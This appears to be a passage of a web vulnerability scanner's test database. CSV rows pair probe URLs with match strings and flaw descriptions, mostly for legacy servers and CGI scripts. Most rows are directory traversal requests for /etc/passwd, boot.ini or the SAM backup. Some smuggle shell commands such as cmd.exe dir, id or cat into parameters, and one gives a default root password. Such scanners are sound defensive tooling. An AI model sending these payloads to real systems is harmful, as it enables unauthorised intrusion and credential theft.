"000433","0","3","/events4.nsf","GET","200","","","","","The events log can be accessed remotely.","",""
"000434","0","3","/log.nsf","GET","200","","","","","The server log is remotely accessible.","",""
"000435","0","3","/names.nsf","GET","200","","","","","User names and groups can be accessed remotely (possibly password hashes a well)","",""
"000436","0","3","/LOGIN.PWD","GET","200","","","","","MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled.","",""
"000437","0","3","/USER/CONFIG.AP","GET","200","","","","","MIPCD configuration information. MIPCD should not have the web interface enabled.","",""
"000438","0","3","@CGIDIRSmail","GET","200","","","","","Simple PERL mailing script to send form data to a pre-configured email address","",""
"000439","0","3","@CGIDIRSnph-error.pl","GET","200","","","","","Gives more information in error messages","",""
"000440","0","3","@CGIDIRSpost-query","POST","200","","","","","Echoes back result of your POST","",""
"000441","0","3","@CGIDIRSquery","GET","200","","","","","Echoes back result of your GET","",""
"000442","0","3","@CGIDIRStest-cgi.tcl","GET","200","","","","","May echo environment variables or give directory listings","",""
"000443","0","3","@CGIDIRStest-env","GET","200","","","","","May echo environment variables or give directory listings","",""
"000444","0","3","/.perf","GET","ListenSocket","","","","","Contains Netscape/iPlanet server performance information","",""
"000445","0","3","/","get","Index of ","","","","","Fasttrack can give a directory listing if issued 'get' instead of 'GET'","",""
"000446","0","3","/","INDEX","Index of ","","","","","Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.","",""
"000447","0","3","//","GET","Proxy autoconfig","","","","","Proxy auto configuration file retrieved.","",""
"000448","0","3","/admin-serv/config/admpw","GET","200","","","","","This file contains the encrypted Netscape admin password. It should not be accessible via the web.","",""
"000449","0","3","/test.php%20","GET","<?","","","","","The OmniHTTP install may allow php/shtml/pl script disclosure.  Upgrade to the latest version.","",""
"000450","0","3","/*.*","GET","index of","","","","","WASD Server reveals the contents of directories via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000451","0","3","/cgi-bin/cgi_process","GET","200","","","","","WASD reveals a lot of system information in this script--it should be removed.","",""
"000452","0","3","/ht_root/wwwroot/-/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000453","0","3","/JUNK(10)","GET","Document not found ... /","","","","","WASD reveals the web root in error requests. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000454","0","3","/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000455","0","3","/tree","GET","200","","","","","WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000456","0","3","@CGIDIRSindex.js0x70","GET","\<\%\=","","","","","The Weblogic can be tricked into revealing jsp source by adding '0x70' to end of the URL.","",""
"000457","0","3","/%00/","GET","<%","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000458","0","3","/%00/","GET","directory listing of","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000459","0","3","/%00/","GET","Index of","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513","",""
"000460","0","3","/%2e/","GET","<%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","",""
"000461","0","3","/%2e/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000462","0","3","/%2e/","GET","Index of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000463","0","3","/%2f/","GET","<%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","",""
"000464","0","3","/%2f/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000465","0","3","/%2f/","GET","Index of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000466","0","3","/%5c/","GET","<%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","",""
"000467","0","3","/%5c/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000468","0","3","/%5c/","GET","Index of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000469","0","3","/index.jsp%00x","GET","<%=","","","","","Bea WebLogic 6.1 SP 2 discloses source by appending %00x to a jsp request. Upgrade to a version newer than 6.2 SP 2 for Win2k. BID-2513","",""
"000470","3268","2","/weblogic","GET","index of","","","","","Directory indexing is enabled: /weblogic","",""
"000471","0","3","/%a%s%p%d","GET","*s?d","","","","","Format bug is present & may reveal system path, upgrade to the latest version.","",""
"000472","0","3","/index.html%20","GET","File for URL","","","","","Website may reveal file system paths by adding %20 to the end of a legitimate .html request.","",""
"000473","0","23","/852566C90012664F","GET","200","","","","","This database can be read using the replica id without authentication.","",""
"000474","0","23","/hidden.nsf","GET","200","","","","","This database can be read withoutauthentication. Common database name.","",""
"000475","0","23","/mail.box","GET","200","","","","","The mail database can be read without authentication.","",""
"000477","0","23","/setup.nsf","GET","200","","","","","The server can be configured remotely, or current setup can be downloaded.","",""
"000478","0","23","/statrep.nsf","GET","200","","","","","Any reports generated by the admins can be retrieved.","",""
"000479","0","23","/webadmin.nsf","GET","200","","","","","The server admin database can be accessed remotely.","",""
"000480","0","3d","@CGIDIRScgitest.exe","GET","200","","","","","This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.","",""
"000481","0","6","/examples/servlet/AUX","GET","200","","","","","Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.","",""
"000482","0","6","@CGIDIRShpnst.exe?c=p+i=SrvSystemInfo.html","GET","200","","","","","HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.","",""
"000483","0","6","/cfdocs/cfmlsyntaxcheck.cfm","GET","200","not found","","","","can be used for a DoS on the server by requesting it check all .exe's","",""
"000484","0","6","/Config1.htm","GET","200","","","","","This may be a D-Link, some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info.","",""
"000485","0","6","/contents/extensions/asp/1","GET","200","","","","","The IIS system may be vulnerable to a DOS, see MS02-018 for details.","",""
"000486","0","6","/WebAdmin.dll?View=Logon","GET","200","","","","","Some versions of WebAdmin are vulnerable to a remote DoS (not tested). See http://www.ngssoftware.com.","",""
"000487","0","6","@CGIDIRSPbcgi.exe","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.","",""
"000488","0","6","@CGIDIRStestcgi.exe","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.","",""
"000489","0","6","/cgi-win/cgitest.exe","GET","200","","","","","This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details.  Remove this default CGI.","",""
"000490","0","7","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","GET","root:","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","",""
"000491","0","8","/c/winnt/system32/cmd.exe?/c+dir+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","",""
"000492","0","8","/cgi-bin/snorkerz.bat","GET","200","","","","","Arguments passed to DOS CGI without checking","",""
"000493","0","8","/cgi-bin/snorkerz.cmd","GET","200","","","","","Arguments passed to DOS CGI without checking","",""
"000494","0","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","[winnt]","","","Internal server error","","Can issue arbitrary commands to host.","",""
"000495","0","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","The paramater is incorrect","","","Internal server error","","May be able to issue arbitrary commands to host.","",""
"000496","0","8","/msadc/samples/adctest.asp","GET","Remote Data Service","","","","","The IIS sample application adctest.asp may be used to remotely execute commands on the server.  RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)","",""
"000497","0","b","/JUNK(10)","GET","SecureIIS application","","","","","Server appears to be running eEye's SecureIIS application, http://www.eeye.com/.","",""
"000498","0","b","/nikto.ida","GET","Rejected-By-UrlScan","","","","","The IIS server is running UrlScan","",""
"000499","0","b","/SUNWmc/htdocs/","GET","en_US","","","","","Sun SMC (Solaris Management Console) is running.","",""
"000500","0","d","@CGIDIRSwebfind.exe?keywords=01234567890123456789","GET","500","","","","","May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater","",""
"000501","0","d","/cgi-shl/win-c-sample.exe","GET","200","","","","","win-c-sample.exe has a buffer overflow","",""
"000502","0","34","/examples/servlet/TroubleShooter","GET","TroubleShooter Servlet Output","","","","","Tomcat default jsp page reveals system information and may be vulnerable to XSS.","",""
"000503","0","8","@CGIDIRSans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","",""
"000504","0","8","@CGIDIRSans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","",""
"000505","0","2","/goform/CheckLogin?login=root&password=tslinux","GET","MainPageTable","","","","","The Cyclades' web user 'root' still has the default password 'tslinux' set, this should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad.","",""
"000506","0","5","/[SecCheck]/..%2f../ext.ini","GET","200","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"000507","0","5","/[SecCheck]/..%255c..%255c../ext.ini","GET","200","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"000508","0","5","/[SecCheck]/..%252f..%252f../ext.ini","GET","200","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"000509","0","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini","GET","[fonts]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","",""
"000510","0","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini","GET","[fonts]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","",""
"000511","0","5","/.nsf/../winnt/win.ini","GET","200","","","","","This win.ini file can be downloaded.","",""
"000512","0","5","/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""
"000513","0","5","/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""
"000514","0","5","/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""
"000515","0","5","/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""
"000516","0","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","[fonts]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","",""
"000517","0","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","[windows]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","",""
"000518","0","5","/................../config.sys","GET","200","","","","","PWS allows files to be read by prepending multiple '.' characters.  At worst, IIS, not PWS, should be used.","",""
"000519","0","5","/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini","GET","boot loader","","","","","Allows attacker to view arbitrary files","",""
"000520","0","5","/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini","GET","boot loader","","","","","Allows attacker to view arbitrary files","",""
"000521","0","5","/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini","GET","boot loader","","","","","Allows attacker to view arbitrary files.","",""
"000522","0","5","/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini","GET","boot loader","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","",""
"000523","0","5","/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","",""
"000524","0","5","/php/php.exe?c:\winnt\boot.ini","GET","boot loader","","","","","Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely.","",""
"000525","0","5","/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\",","GET","boot.ini","","","","","PHP Ping allows commands to be executed on the remote host.","",""
"000526","0","5","/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini","GET","boot loader","","","","","The boot.ini file was retrieved by using the db4web executable.","",""
"000527","0","5","/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini","GET","boot loader","","","","","Default scripts can allow arbitrary access to the host.","",""
"000528","0","5","/wx/s.dll?d=/boot.ini","GET","boot loader","","","","","WebCollection Plus allows any file to be retrieved from the remote system.","",""
"000529","0","5","@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0","GET","resolv.conf","","","","","This CGI allows attackers to view arbitrary files on the host.","",""
"000530","0","5","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini","GET","boot loader","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","",""
"000531","0","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00","GET","[boot loader]","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","",""
"000532","0","5","@CGIDIRSSQLServ/sqlbrowse.asp?filepath=c:\&Opt=3","GET","boot.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","",""
"000533","0","5","@CGIDIRSstats/statsbrowse.asp?filepath=c:\&Opt=3","GET","boot.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","",""
"000534","0","5","@CGIDIRStest.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot.ini","","","","","This CGI allows attackers to read files from the server.","",""
"000535","0","5","@CGIDIRStst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,","GET","boot.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","",""
"000536","0","5","@CGIDIRSinput.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot.ini","","","","","This CGI allows attackers to read files from the server.","",""
"000537","0","5","@CGIDIRSinput2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot.ini","","","","","This CGI allows attackers to read files from the server.","",""
"000538","0","5","/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\","GET","boot.ini","","","","","This CGI allows attackers to read files from the server.","",""
"000539","0","5","/php/php.exe?c:\boot.ini","GET","boot loader","","","","","The Apache config allows php.exe to be called directly."," ",""
"000540","0","5","/../../../../../../../../../boot.ini","GET","boot loader","","","","","The remote server allows any system file to be retrieved remotely.","",""
"000541","0","5","/../../../../winnt/repair/sam._","GET","200","","","Forbidden","","Sam backup successfully retrieved.","",""
"000542","0","5","/..\\..\\..\\..\\..\\..\\..\\boot.ini","GET","boot loader","","","","","It is possible to read files on the server by adding /../ in front of file name.","",""
"000543","0","5","///etc/passwd","GET","root:","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","",""
"000544","0","5","///etc/hosts","GET","200","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","",""
"000545","0","5","////./../.../boot.ini","GET","boot loader","","","","","Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details.","",""
"000546","0","5","/.cobalt/sysManage/../admin/.htaccess","GET","AuthName","","","","","Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory.","",""
"000547","0","5","/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd","GET","root:","","","","","Coppermine 1.0 RC3 may have been compromised to allow arbitrary file retreival. Upgrade to the latest at http://www.chezgreg.net/coppermine/","",""
"000548","0","5","/autohtml.php?op=modload&mainfile=x&name=/etc/passwd","GET","root:","","","","","php-proxima 6.0 and below allows arbitrary files to be retrieved.","",""
"000549","0","5","/atomicboard/index.php?location=../../../../../../../../../../etc/passwd","GET","root:","","","","","AtomicBoard v0.6.2 allows remote users to read arbitrary files.","",""
"000550","0","5","/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","",""
"000551","0","5","/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","",""
"000552","0","5","/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00","GET","root:","","","","","Typo3 allows any file to be retrieved remotely. Upgrade to the latest version.","",""
"000553","0","5","/DomainFiles/*//../../../../../../../../../../etc/passwd","GET","root:","","","","","Communigate Pro 4.0b to 4.0.2 allow any file to be retrieved from the remote system.","",""
"000554","0","5","/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini","GET","boot loader","","","","","Gafware's CFXImage allows remote users to view any file on the system.","",""
"000555","0","5","/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1","GET","root:","","","","","eZ httpbench version 1.1 allows any file on the remote server to be retrieved.","",""
"000556","0","5","/index.php?download=/winnt/win.ini","GET","[fonts]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","",""
"000557","0","5","/index.php?download=/windows/win.ini","GET","[windows]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","",""
"000558","0","5","/index.php?download=/etc/passwd","GET","root:","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","",""
"000559","0","5","/index.php?|=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","",""
"000560","0","5","/index.php?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","",""
"000561","0","5","/index.php?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","",""
"000562","0","5","/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","",""
"000563","0","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd","GET","root:","","","","","Default JRun CGI lets users read any system file.","",""
"000564","0","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini","GET","boot loader","","","","","Default JRun CGI lets users read any system file.","",""
"000565","0","5","/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor","GET","root:","","","","","Kebi Academy 2001 Web Solution allows any file to be retrieved from the remote system.","",""
"000566","0","5","/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0","GET","root:","","","","","nCUBE Server Manage 1.0 allows any file to be read on the remote system.","",""
"000567","0","5","/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0","GET","passwd","","","","","nCUBE Server Manage 1.0 allows directory listings of any location on the remote system.","",""
"000568","0","5","/phprocketaddin/?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","",""
"000569","0","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd","GET","root:","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","",""
"000570","0","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc","GET","passwd","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","",""
"000571","0","5","/phptonuke.php?filnavn=/etc/passwd","GET","root:","","","","","Photonouke or myphpnuke allows artbitrary file to be retrieved from the remote host.","",""
"000572","0","5","/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd","GET","root:","","","","","NCR's Terradata server contains a CGI which allows any file to be retrieved remotely.","",""
"000573","0","5","/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","",""
"000574","0","5","/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","",""
"000575","0","5","/viewpage.php?file=/etc/passwd","GET","root:","","","","","PHP Nuke script viewpage.php allows any file to be retrieved from the remote system.","",""
"000576","0","5","/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name.","",""
"000577","0","5","/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif","GET","boot loader","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/","",""
"000578","0","5","/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif","GET","root:","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/","",""
"000579","0","5","@CGIDIRSadmin.cgi?list=../../../../../../../../../../etc/passwd","GET","root:","","","","","Add2it Mailman Free V1.73 allows arbitrary files to be retrieved.","",""
"000580","0","5","@CGIDIRS14all.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000581","0","5","@CGIDIRS14all-1.1.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000582","0","5","@CGIDIRSanacondaclip.pl?template=../../../../../../../../../../etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files from the server.","",""
"000583","0","5","@CGIDIRSauktion.cgi?menue=../../../../../../../../../../etc/passwd","GET","root:","","","","","The CGI allows attackers to read arbitrary files remotely.","",""
"000584","0","5","@CGIDIRSbigconf.cgi?command=view_textfile&file=/etc/passwd&filters=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","",""
"000585","0","5","@CGIDIRSbb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system.","",""
"000586","0","5","@CGIDIRSbb-hist?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","",""
"000587","0","5","@CGIDIRSbb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","",""
"000588","0","5","@CGIDIRScommon.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","",""
"000589","0","5","@CGIDIRScommerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","",""
"000590","0","5","@CGIDIRScgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","",""
"000591","0","5","@CGIDIRScal_make.pl?p0=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","",""
"000592","0","5","@CGIDIRSdb4web_c/dbdirname//etc/passwd","GET","root:","","","","","The passwd file was retrieved by using the db4web executable.","",""
"000593","0","5","@CGIDIRSdirectorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","",""
"000594","0","5","@CGIDIRSemumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000595","0","5","@CGIDIRSemumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000596","0","5","@CGIDIRSemu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000597","0","5","@CGIDIRSfaxsurvey?cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to execute commands and read files remotely.","",""
"000598","0","5","@CGIDIRSfaqmanager.cgi?toc=/etc/passwd%00","GET","root:","","","","","FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version: http://www.fourteenminutes.com/code/faqmanager/","",""
"000599","0","5","@CGIDIRSezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1","GET","200","","","","","EZShopper search CGI read arbitrary files","",""
"000600","0","5","@CGIDIRSformmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","",""
"000601","0","5","@CGIDIRSformmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","",""
"000602","0","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1","GET","[fonts]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","",""
"000603","0","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1","GET","[windows]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","",""
"000604","0","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1","GET","root:","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","",""
"000605","0","5","@CGIDIRShtmlscript?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vul that allows attackers to read any system file.","",""
"000606","0","5","@CGIDIRShtgrep?file=index.html&hdr=/etc/passwd","GET","root:","","","","","This CGI contains a well known vul that allows attackers to read any system file.","",""
"000607","0","5","@CGIDIRShsx.cgi?show=../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI contains a well known vul that allows attackers to read any system file.","",""
"000608","0","5","@CGIDIRSsewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd","GET","root:","","","","","Default scripts can allow arbitrary access to the host.","",""
"000609","0","5","@CGIDIRSsbcgi/sitebuilder.cgi","GET","200","","","","","SITEBUILDER v1.4 may allow retrieval of any file. With a valid username and password, request: /<CGIDIR>/sbcgi/sitebuilder.cgi?username=<user>&password=<password>&selectedpage=../../../../../../../../../../etc/passwd","",""
"000610","0","5","@CGIDIRSmrtg.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000611","0","5","@CGIDIRSmrtg.cfg?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000612","0","5","@CGIDIRSmain.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","",""
"000613","0","5","@CGIDIRSmail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00","GET","root:","","","","","MailReader.com v2.3.31 web package allows remote users to retrieve any system file.","",""
"000614","0","5","@CGIDIRSmail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000615","0","5","@CGIDIRSloadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","[windows]","","","","","This CGI allows attackers to read arbitrary files on the host.","",""
"000616","0","5","@CGIDIRSloadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","",""
